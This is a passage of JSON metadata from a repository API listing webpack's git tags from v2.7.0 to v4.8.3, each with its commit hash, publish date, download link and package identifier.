ependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_